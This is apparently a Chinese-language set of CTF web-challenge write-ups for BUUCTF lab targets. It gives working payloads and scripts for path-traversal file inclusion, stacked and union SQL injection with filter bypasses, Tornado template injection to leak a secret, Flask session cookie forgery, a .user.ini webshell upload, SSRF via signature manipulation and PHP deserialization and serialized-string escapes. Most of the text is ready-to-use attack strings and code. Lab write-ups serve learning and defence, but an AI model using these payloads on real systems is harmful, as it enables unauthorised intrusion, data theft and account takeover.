进来就是一个大大的滑稽,F12拿到源码链接source.php
"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "
";
}
?>
白名单中只有两个页面:source.php和hint.php,看hint.php
最后如果request得到的file值非空、是字符串且通过了checkFile,则包含file
因为服务器会自动url解码一次,这里用二次编码
payload:source.php?file=hint.php%253f../../../../../../../ffffllllaaaagggg
参考链接:https://www.jianshu.com/p/0d75017c154f(CVE-2018-12613)
输入1’报错,1’ #正常
1’ order by 2# | 1’ order by 3# |
---|---|
正常 | error 1054 : Unknown column ‘3’ in ‘order clause’ |
得出有两个字段,再联合查询一下,发现过滤了部分sql关键字
1';show tables;# //发现表1919810931114514和words
1'; show columns from `1919810931114514`;# //发现表1919810931114514中有flag列
先将select * from `1919810931114514`
进行十六进制编码一下,得到如下值
0x73656c656374202a2066726f6d20603139313938313039333131313435313460
再通过预处理语句,最终构造的payload如下,得到flag
payload:1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
这个必须要记一下,确实是太骚了
payload:1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;alter table `words` change `flag` `id` varchar(100) character set utf8 collate utf8_general_ci not null;show columns from words;#
/welcome.txt:render
简单的百度了一下,这是render+tornado的python模板
/hints.txt: md5(cookie_secret+md5(filename))
哈希计算规则
/flag.txt:flag in /fllllllllllllag
此时的url为/file?filename=/flag.txt&filehash=c9f7065977d26874f6d8e0f782aa1e21
也就是文件名+文件哈希值访问
将文件名改为/fllllllllllllag
返回一个Error页面,且参数msg=Error
tornado模板快速访问
{{ escape(handler.settings["cookie"]) }}
handler指向RequestHandler
RequestHandler.settings指向self.application.settings
所以handler.settings指向RequestHandler.application.settings
输入msg={{handler.settings}}
得到cookie_secret: 7dd9f819-0bd5-4a55-85a7-2b2b3156f0e7
抄个脚本计算一下哈希值
import hashlib
def md5value(s):
md5 = hashlib.md5()
md5.update(s.encode())
return md5.hexdigest()
def mdfive2():
filename = '/fllllllllllllag'
cookie = r"7dd9f819-0bd5-4a55-85a7-2b2b3156f0e7"
print(md5value(cookie + md5value(filename)))
mdfive2()
得到哈希值为:8a12c7de285700b57d8aa3222d4c1790
最终的url
http://7bdadb48-8aab-4cee-b71f-1810a54d1e97.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=8a12c7de285700b57d8aa3222d4c1790
在本地搭一下环境,然后写个脚本测试一下文件里的shell
python脚本如下:
import os
import requests
import re
import sys
for i in os.listdir("E:\911208\phpstudy\PHPTutorial\WWW\src")[::-1]:
with open ("E:\911208\phpstudy\PHPTutorial\WWW\src\{}".format(i)) as f:
content=f.read()
url="http://127.0.0.1/src/{}".format(i)
rc = re.compile(r'(\$_GET\[\')(.*)(\'\])')
result=rc.findall(content)
for r in result:
a=r[1]
url1=url+"?"+a+"=echo 'hackedha';"
print(url1)
sys.stdout.flush()
r=requests.get(url=url1)
r=r.content.decode('utf-8')
if 'hacked' in r:
print('yes')
print(url)
exit()
ok,下载下来发现是靶场源码,用的是flask框架
flask框架的session机制
学习链接:https://www.anquanke.com/post/id/163975
flask中session储存在客户端cookie中,且flask没有加密操作,其cookie全部内容都可以被读取。
config.py
SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
index.html
{% if current_user.is_authenticated and session['name'] == 'admin' %}
hctf{xxxxxxxxx}
脚本如下:
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'
# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast
# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
from abc import ABCMeta, abstractmethod
else: # > 3.4
from abc import ABC, abstractmethod
# Lib for argument parsing
import argparse
# external Imports
from flask.sessions import SecureCookieSessionInterface
class MockApp(object):
def __init__(self, secret_key):
self.secret_key = secret_key
if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
class FSCM(metaclass=ABCMeta):
def encode(secret_key, session_cookie_structure):
""" Encode a Flask session cookie """
try:
app = MockApp(secret_key)
session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.dumps(session_cookie_structure)
except Exception as e:
return "[Encoding error] {}".format(e)
raise e
def decode(session_cookie_value, secret_key=None):
""" Decode a Flask cookie """
try:
if(secret_key==None):
compressed = False
payload = session_cookie_value
if payload.startswith('.'):
compressed = True
payload = payload[1:]
data = payload.split(".")[0]
data = base64_decode(data)
if compressed:
data = zlib.decompress(data)
return data
else:
app = MockApp(secret_key)
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.loads(session_cookie_value)
except Exception as e:
return "[Decoding error] {}".format(e)
raise e
else: # > 3.4
class FSCM(ABC):
def encode(secret_key, session_cookie_structure):
""" Encode a Flask session cookie """
try:
app = MockApp(secret_key)
session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.dumps(session_cookie_structure)
except Exception as e:
return "[Encoding error] {}".format(e)
raise e
def decode(session_cookie_value, secret_key=None):
""" Decode a Flask cookie """
try:
if(secret_key==None):
compressed = False
payload = session_cookie_value
if payload.startswith('.'):
compressed = True
payload = payload[1:]
data = payload.split(".")[0]
data = base64_decode(data)
if compressed:
data = zlib.decompress(data)
return data
else:
app = MockApp(secret_key)
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.loads(session_cookie_value)
except Exception as e:
return "[Decoding error] {}".format(e)
raise e
if __name__ == "__main__":
# Args are only relevant for __main__ usage
## Description for help
parser = argparse.ArgumentParser(
description='Flask Session Cookie Decoder/Encoder',
epilog="Author : Wilson Sumanang, Alexandre ZANNI")
## prepare sub commands
subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')
## create the parser for the encode command
parser_encode = subparsers.add_parser('encode', help='encode')
parser_encode.add_argument('-s', '--secret-key', metavar='',
help='Secret key', required=True)
parser_encode.add_argument('-t', '--cookie-structure', metavar='',
help='Session cookie structure', required=True)
## create the parser for the decode command
parser_decode = subparsers.add_parser('decode', help='decode')
parser_decode.add_argument('-s', '--secret-key', metavar='',
help='Secret key', required=False)
parser_decode.add_argument('-c', '--cookie-value', metavar='',
help='Session cookie value', required=True)
## get args
args = parser.parse_args()
## find the option chosen
if(args.subcommand == 'encode'):
if(args.secret_key is not None and args.cookie_structure is not None):
print(FSCM.encode(args.secret_key, args.cookie_structure))
elif(args.subcommand == 'decode'):
if(args.secret_key is not None and args.cookie_value is not None):
print(FSCM.decode(args.cookie_value,args.secret_key))
elif(args.cookie_value is not None):
print(FSCM.decode(args.cookie_value))
session解密得到的结果为:
{'_fresh': True, '_id': b'50b3c6db23d13770917e4cb8c61cdf67dde86cff5e2e47f6be2daa872de7fdd150373ce7263caf379095ea77543d926414333a9cbb5fbd8c80f60df20bb4981e', 'csrf_token': b'47af145519e08dd39d3e2b4b8d3d5e5f604cd8ea', 'image': b'jPsF', 'name': '0xdawn', 'user_id': '10'}
将name中的值修改为admin后再加密,得到的session如下:
.eJxFkEGLwjAQhf_KMmcPNdWL4EWiwYVJaWksk4uorTZp40JV2kb875t1Yfc0zDz43nvzhP25q241LO7do5rA3pSweMLHERYg85VBhkyL7YgsHdCfYuTNIJmKiG1n5Gkgljlpy0YLNZNOOm13LToVSUaMnBq12NQJP4WpYu2yBnPVB44npmK0gcA2LuzzwJ3qYh1Lr6LgNQ9ahHnq0cs6KaQhu3Pk0uB56bWlXgsaUXwayZsZFmoJrwmcbt15f_9qqut_BV7W2q4jmashKVSfiBDBtw0yNZLNTCJSr_mulQUx5JnVvG4pXb5xxh0u1R_p0K58dvlVrgdX_ZxKZ64wgcet6t5_g2kEr29DqW27.Xd9y8Q.BKLvXPsrixjIr4i0d8Fhkvaq03g
再将自己的session值替换为伪造的值,即可完成admin登录
';
echo 'Your files :
';
var_dump(scandir($userdir));
}
自 PHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件。此类文件仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果使用 Apache,则用 .htaccess 文件有同样效果。
.user.ini利用条件
服务器脚本语言为php
服务器使用CGI/FastCGI模式
上传目录下有可执行的php文件
auto_prepend_fiile、auto_append_file
该配置项会让php文件在执行前先包含一个指定的文件
上传一个.user.ini文件,内容如下
GIF89a
auto_prepend_file=1.jpg
上传1.jpg
GIF89a
菜刀连上,找到flag
源码在http://node3.buuoj.cn:27584/calc.php下
php需要将所有参数转换为有效的变量名,在解析查询字符串时
测试结果如下:
calc.php?num=phpinfo() | Forbidden |
---|---|
calc.php?%20num=phpinfo() | 回显 |
查看禁用的函数:
scandir() 函数返回指定目录中的文件和目录的数组。
语法:scandir(directory,sorting_order,context);
directory | 必须,规定要扫描的目录 |
---|---|
sorting_order | 可选,规定排列顺序。默认是 0,表示按字母升序排列。 |
context | 可选,规定目录句柄的环境。 |
扫描根目录下所有文件:scandir(/)
char(47)代替 / 绕过黑名单
payload:calc.php?%20num=var_dump(scandir(chr(47)))
file_get_contents() 函数是用于将文件的内容读入到一个字符串中的首选方法。
语法:file_get_contents(path,include_path,context,start,max_length)
path | 必需。规定要读取的文件。 |
---|---|
include_path | 可选。如果也想在 include_path 中搜寻文件的话,可以将该参数设为 “1”。 |
context | 可选。规定文件句柄的环境。 |
start | 可选。规定在文件中开始读取的位置。该参数是 PHP 5.1 新加的。 |
max_length | 可选。规定读取的字节数。该参数是 PHP 5.1 新加的。 |
GetFlag:calc.php?%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
参考链接:https://paper.seebug.org/1048/
经测试CL-CL方式可用,请求如下:
https://github.com/CTFTraining/delta_2019_web_ssrfme
#! /usr/bin/env python
#encoding=utf-8
from flask import Flask
from flask import request
import socket
import hashlib
import urllib
import sys
import os
import json
reload(sys)
sys.setdefaultencoding('latin1')
app = Flask(__name__)
secert_key = os.urandom(16)
class Task:
def __init__(self, action, param, sign, ip):
self.action = action
self.param = param
self.sign = sign
self.sandbox = md5(ip)
if(not os.path.exists(self.sandbox)): #SandBox For Remote_Addr
os.mkdir(self.sandbox)
def Exec(self):
result = {}
result['code'] = 500
if (self.checkSign()):
if "scan" in self.action:
tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
resp = scan(self.param)
if (resp == "Connection Timeout"):
result['data'] = resp
else:
print resp
tmpfile.write(resp)
tmpfile.close()
result['code'] = 200
if "read" in self.action:
f = open("./%s/result.txt" % self.sandbox, 'r')
result['code'] = 200
result['data'] = f.read()
if result['code'] == 500:
result['data'] = "Action Error"
else:
result['code'] = 500
result['msg'] = "Sign Error"
return result
def checkSign(self):
if (getSign(self.action, self.param) == self.sign):
return True
else:
return False
#generate Sign For Action Scan.
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
param = urllib.unquote(request.args.get("param", ""))
action = "scan"
return getSign(action, param)
@app.route('/De1ta',methods=['GET','POST'])
def challenge():
action = urllib.unquote(request.cookies.get("action"))
param = urllib.unquote(request.args.get("param", ""))
sign = urllib.unquote(request.cookies.get("sign"))
ip = request.remote_addr
if(waf(param)):
return "No Hacker!!!!"
task = Task(action, param, sign, ip)
return json.dumps(task.Exec())
@app.route('/')
def index():
return open("code.txt","r").read()
def scan(param):
socket.setdefaulttimeout(1)
try:
return urllib.urlopen(param).read()[:50]
except:
return "Connection Timeout"
def getSign(action, param):
return hashlib.md5(secert_key + param + action).hexdigest()
def md5(content):
return hashlib.md5(content).hexdigest()
def waf(param):
check=param.strip().lower()
if check.startswith("gopher") or check.startswith("file"):
return True
else:
return False
if __name__ == '__main__':
app.debug = False
app.run(host='0.0.0.0')
def getSign(action, param):
return hashlib.md5(secert_key + param + action).hexdigest()
假设secert_key为xxx,访问/geneSign?param=flag.txt,返回的md5为md5(‘xxx’ + ‘flag.txt’ + ‘scan’)
构造访问/geneSign?param=flag.txtread,得到的md5为md5(‘xxx’ + ‘flag.txtread’ + ‘scan’ ),即为目标sign
文件包含得到sign
http://5cb1ec0e-c4a0-4c5f-b967-87d59660cabf.node3.buuoj.cn/geneSign?param=local_file:///app/flag.txtread
参考链接:https://xz.aliyun.com/t/5927
name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
curl_close($ch);
return $output;
}
public function getBlogContents ()
{
return $this->get($this->blog);
}
public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}
}
order by得到长度为4
报数据库名
curl_exec()使用不当造成SSRF(服务器端请求伪造)
报错信息可知网站绝对路径(/var/www/html/)和数据库里的数据都是反序列存储
通过file协议读文件
payload:
view.php?no=-1++union++select++1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:4:"test";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'--+
base64解码得到flag
flag在config.php中
update.php中POST提交的参数及正则
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);
$user->update_profile($username, serialize($profile));
if(!preg_match('/^\d{11}$/', $_POST['phone']))
die('Invalid phone');
if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
die('Invalid email');
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname');
$file = $_FILES['photo'];
if($file['size'] < 5 or $file['size'] > 1000000)
die('Photo size error');
profile.php中存在文件读取
$profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo']));
当$profile[‘photo’]为config.php时即可读取到flag,而且这里还有个反序列化操作
class.php中的参数过滤
public function filter($string) {
$escape = array('\'', '\\\\');
$escape = '/' . implode('|', $escape) . '/';
$string = preg_replace($escape, '_', $string);
$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i';
return preg_replace($safe, 'hacker', $string);
}
其中需要注意的是where被替换成hacker是,长度加1
update.php中POST提交完后对$profile进行序列化操作
结果为:a:4:{s:5:"phone";s:11:"18581582507";s:5:"email";s:17:"[email protected]";s:8:"nickname";s:6:"0xdawn";s:5:"photo";s:10:"config.php";}
在nikename后加上";}s:5:“photo”;s:10:“config.php”;} 一共是34个字符,利用正则表达式替换34个where为hacker,即可把这34个字符挤到photo中
用数组绕过nickname的正则过滤
将nickname修改为以下值
wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}
PD9waHAKJGNvbmZpZ1snaG9zdG5hbWUnXSA9ICcxMjcuMC4wLjEnOwokY29uZmlnWyd1c2VybmFtZSddID0gJ3Jvb3QnOwokY29uZmlnWydwYXNzd29yZCddID0gJ3F3ZXJ0eXVpb3AnOwokY29uZmlnWydkYXRhYmFzZSddID0gJ2NoYWxsZW5nZXMnOwokZmxhZyA9ICdmbGFne2E1NWE1ZjczLTM5M2ItNGQyOS1hNDBkLWQ0MWFhMDA3MGQyYn0nOwo/Pgo=
base64解码得到flag
F12得到源码如下
$cat=$_GET['cat'];
echo $cat;
if($cat=='dog')
{
echo 'Syc{cat_cat_cat_cat}';
}
payload:http://9b94f9bf-5000-46eb-9bff-181b6330400e.node3.buuoj.cn/?cat=dog
抓包得到secr3t.php这个页面,代码如下
secret
考点是php伪协议读取文件
payload:http://b8fc1459-1aac-406c-8ef2-af149e5b70ed.node3.buuoj.cn/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
base64解码后得到flag
直接万能密码注入得到flag
没有任何过滤,一步步联合查询就行了
数据库名:username=admin&password=admin'union select
1,2,group_concat(schema_name) from information_schema.schemata#
表名:username=admin&password=admin'union select 1,2,group_concat(table_name) from
information_schema.tables where table_schema=database()#
列名:username=admin&password=admin'union select 1,2,group_concat(column_name) from
information_schema.columns where table_schema=database() and
table_name='l0ve1ysq1'#
字段值:username=admin&password=admin'union select
1,2,group_concat(password) from l0ve1ysq1#
过滤了一些关键字,需要双写绕过
数据库名:username=admin&password=admin'uniunionon selselectect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata--+
表名:username=admin&password=admin'uniunionon selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema%3Ddatabase()--+
列名:username=admin&password=admin'uniunionon selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'--+
字段值:username=admin&password=admin'uniunionon selselectect 1,2,group_concat(passwoorrd) frfromom b4bsql--+